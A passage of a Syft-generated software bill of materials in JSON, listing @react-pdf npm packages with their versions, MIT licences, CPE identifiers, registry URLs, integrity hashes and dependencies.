.3:a:\\@react_pdf\\/fns:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/fns:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/fns@3.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/fns/-/fns-3.1.3.tgz","integrity":"sha512-0I7pApDr1/RLAKbizuLy/IHTEa93LSPy/bEwYniboC3Xqnp6Od8xFJKbKEzGw2wh/5zKFFwl00g4t9RwgIMc3w==","dependencies":null}},{"id":"15064a64821e35da","name":"@react-pdf/font","version":"2.5.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/font:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/font:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/font:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/font:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/font:2.5.2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/font:2.5.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/font@2.5.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/font/-/font-2.5.2.tgz","integrity":"sha512-Ud0EfZ2FwrbvwAWx8nz+KKLmiqACCH9a/N/xNDOja0e/YgSnqTpuyHegFBgIMKjuBtO5dNvkb4dXkxAhGe/ayw==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/types":"^2.6.0","cross-fetch":"^3.1.5","fontkit":"^2.0.2","is-url":"^1.2.4"}}},{"id":"19aa56c736ba6f4e","name":"@react-pdf/font","version":"4.0.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/font:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/font:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/font:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/font:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/font:4.0.8:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/font:4.0.8:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/font@4.0.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/font/-/font-4.0.8.tgz","integrity":"sha512-deNd+emtZAJho1IlzKL9bRoLAGv/6oXOIKO2oZfs4RuXUrK1onLHbJO7e2YoVLPFP/sQxisRTnzdJFtd35iKwA==","dependencies":{"@react-pdf/pdfkit":"^5.1.1","@react-pdf/types":"^2.11.1","fontkit":"^2.0.2","is-url":"^1.2.4"}}},{"id":"e700f7d1572a4159","name":"@react-pdf/image","version":"2.3.6","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/image:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/image:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/image:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/image:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/image:2.3.6:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/image:2.3.6:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/image@2.3.6","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/image/-/image-2.3.6.tgz","integrity":"sha512-7iZDYZrZlJqNzS6huNl2XdMcLFUo68e6mOdzQeJ63d5eApdthhSHBnkGzHfLhH5t8DCpZNtClmklzuLL63ADfw==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/png-js":"^2.3.1","cross-fetch":"^3.1.5","jay-peg":"^1.0.2"}}},{"id":"bfc90f0951098a84","name":"@react-pdf/layout","version":"3.13.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/layout:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/layout:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/layout:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/layout:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/layout:3.13.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/layout:3.13.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/layout@3.13.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/layout/-/layout-3.13.0.tgz","integrity":"sha512-lpPj/EJYHFOc0ALiJwLP09H28B4ADyvTjxOf67xTF+qkWd+dq1vg7dw3wnYESPnWk5T9NN+HlUenJqdYEY9AvA==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/fns":"2.2.1","@react-pdf/image":"^2.3.6","@react-pdf/pdfkit":"^3.2.0","@react-pdf/primitives":"^3.1.1","@react-pdf/stylesheet":"^4.3.0","@react-pdf/textkit":"^4.4.1","@react-pdf/types":"^2.6.0","cross-fetch":"^3.1.5","emoji-regex":"^10.3.0","queue":"^6.0.1","yoga-layout":"^2.0.1"}}},{"id":"3f225c34b86f8909","name":"@react-pdf/pdfkit","version":"3.2.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/pdfkit:3.2.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/pdfkit@3.2.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-3.2.0.tgz","integrity":"sha512-OBfCcnTC6RpD9uv9L2woF60Zj1uQxhLFzTBXTdcYE9URzPE/zqXIyzpXEA4Vf3TFbvBCgFE2RzJ2ZUS0asq7yA==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/png-js":"^2.3.1","browserify-zlib":"^0.2.0","crypto-js":"^4.2.0","fontkit":"^2.0.2","jay-peg":"^1.0.2","vite-compatible-readable-stream":"^3.6.1"}}},{"id":"24d45580f4c0f7bb","name":"@react-pdf/pdfkit","version":"5.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/pdfkit:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/pdfkit:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/pdfkit:5.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/pdfkit@5.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-5.1.1.tgz","integrity":"sha512-wNcdSsNlNYyGHGAgIdt453egBF7fiF9UxpRlklUfVvu8OWCrUppG9xiUrPLVoKiqWet5tMi0w6LmuFUJuYqjEg==","dependencies":{"@babel/runtime":"^7.20.13","@noble/ciphers":"^1.0.0","@noble/hashes":"^1.6.0","browserify-zlib":"^0.2.0","fontkit":"^2.0.2","jay-peg":"^1.1.1","js-md5":"^0.8.3","linebreak":"^1.1.0","png-js":"^2.0.0","vite-compatible-readable-stream":"^3.6.1"}}},{"id":"ecd22ec88d1d110f","name":"@react-pdf/png-js","version":"2.3.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/png-js:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/png-js:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/png_js:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/png_js:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/png:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/png:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/png:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/png:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/png-js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/png_js:2.3.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/png-js@2.3.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/png-js/-/png-js-2.3.1.tgz","integrity":"sha512-pEZ18I4t1vAUS4lmhvXPmXYP4PHeblpWP/pAlMMRkEyP7tdAeHUN7taQl9sf9OPq7YITMY3lWpYpJU6t4CZgZg==","dependencies":{"browserify-zlib":"^0.2.0"}}},{"id":"18694a13e91dacfb","name":"@react-pdf/primitives","version":"3.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/primitives:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/primitives:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/primitives:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/primitives:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/primitives@3.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/primitives/-/primitives-3.1.1.tgz","integrity":"sha512-miwjxLwTnO3IjoqkTVeTI+9CdyDggwekmSLhVCw+a/7FoQc+gF3J2dSKwsHvAcVFM0gvU8mzCeTofgw0zPDq0w==","dependencies":null}},{"id":"edf229ed71e6ba52","name":"@react-pdf/primitives","version":"4.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/primitives:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/primitives:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/primitives:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/primitives:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/primitives@4.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/primitives/-/primitives-4.3.0.tgz","integrity":"sha512-nYXoZ36pvwNzbc54+DbL8RCn15jU7woJ9D/svnh5tpUXekJ+CbI4mZLo6boSv24CvJgychOu6h7gxX03B4ps0A==","dependencies":null}},{"id":"3e1fba314601b9a8","name":"@react-pdf/render","version":"3.5.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/render:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/render:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/render:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/render:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/render@3.5.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/render/-/render-3.5.0.tgz","integrity":"sha512-gFOpnyqCgJ6l7VzfJz6rG1i2S7iVSD8bUHDjPW9Mze8TmyksHzN2zBH3y7NbsQOw1wU6hN4NhRmslrsn+BRDPA==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/fns":"2.2.1","@react-pdf/primitives":"^3.1.1","@react-pdf/textkit":"^4.4.1","@react-pdf/types":"^2.6.0","abs-svg-path":"^0.1.1","color-string":"^1.9.1","normalize-svg-path":"^1.1.0","parse-svg-path":"^0.1.2","svg-arc-to-cubic-bezier":"^3.2.0"}}},{"id":"d2a573a75d297737","name":"@react-pdf/renderer","version":"3.4.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/renderer:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/renderer:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/renderer:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/renderer:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/renderer@3.4.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/renderer/-/renderer-3.4.5.tgz","integrity":"sha512-O1N8q45bTs7YuC+x9afJSKQWDYQy2RjoCxlxEGdbCwP+WD5G6dWRUWXlc8F0TtzU3uFglYMmDab2YhXTmnVN9g==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/font":"^2.5.2","@react-pdf/layout":"^3.13.0","@react-pdf/pdfkit":"^3.2.0","@react-pdf/primitives":"^3.1.1","@react-pdf/render":"^3.5.0","@react-pdf/types":"^2.6.0","events":"^3.3.0","object-assign":"^4.1.1","prop-types":"^15.6.2","queue":"^6.0.1","scheduler":"^0.17.0"}}},{"id":"618f90b9a2f3d884","name":"@react-pdf/stylesheet","version":"4.3.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/stylesheet@4.3.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-4.3.0.tgz","integrity":"sha512-x7IVZOqRrUum9quuDeFXBveXwBht+z/6B0M+z4a4XjfSg1vZVvzoTl07Oa1yvQ/4yIC5yIkG2TSMWeKnDB+hrw==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/fns":"2.2.1","@react-pdf/types":"^2.6.0","color-string":"^1.9.1","hsl-to-hex":"^1.0.0","media-engine":"^1.0.3","postcss-value-parser":"^4.1.0"}}},{"id":"ff4544477cbe31d7","name":"@react-pdf/stylesheet","version":"6.2.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/stylesheet@6.2.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-6.2.1.tgz","integrity":"sha512-2+UEk+7e+z8baaWi2l5kPLWmwtJeOI+T5wW9GGeN3iDH7vd3kbTqOpN1yt9mmfNVZFxQsnDHpznFb5v5UF983A==","dependencies":{"@react-pdf/fns":"3.1.3","@react-pdf/types":"^2.11.1","color-string":"^2.1.4","hsl-to-hex":"^1.0.0","media-engine":"^1.0.3","postcss-value-parser":"^4.1.0"}}},{"id":"9a502dcbe994e863","name":"@react-pdf/textkit","version":"4.4.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/textkit:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/textkit:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/textkit:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/textkit:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/textkit@4.4.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/textkit/-/textkit-4.4.1.tgz","integrity":"sha512-Jl9wdTqIvJ5pX+vAGz0EOhP7ut5Two9H6CzTKo/YYPeD79cM2yTXF3JzTERBC28y7LR0Waq9D2LHQjI+b/EYUQ==","dependencies":{"@babel/runtime":"^7.20.13","@react-pdf/fns":"2.2.1","bidi-js":"^1.0.2","hyphen":"^1.6.4","unicode-properties":"^1.4.1"}}},{"id":"3103913e34f4201d","name":"@react-pdf/types","version":"2.11.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/types:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/types:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/types:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/types:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/types:2.11.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/types:2.11.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/types@2.11.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/types/-/types-2.11.1.tgz","integrity":"sha512-i9xQgfaDU9QoeNnbp6rltXCWg1huEh195rpOuN8cE4BZ2FuLdQrsIcb2dhFF9aOxXf+XBA6LOSpIW051MDD/bw==","dependencies":{"@react-pdf/font":"^4.0.8","@react-pdf/primitives":"^4.3.0","@react-pdf/stylesheet":"^6.2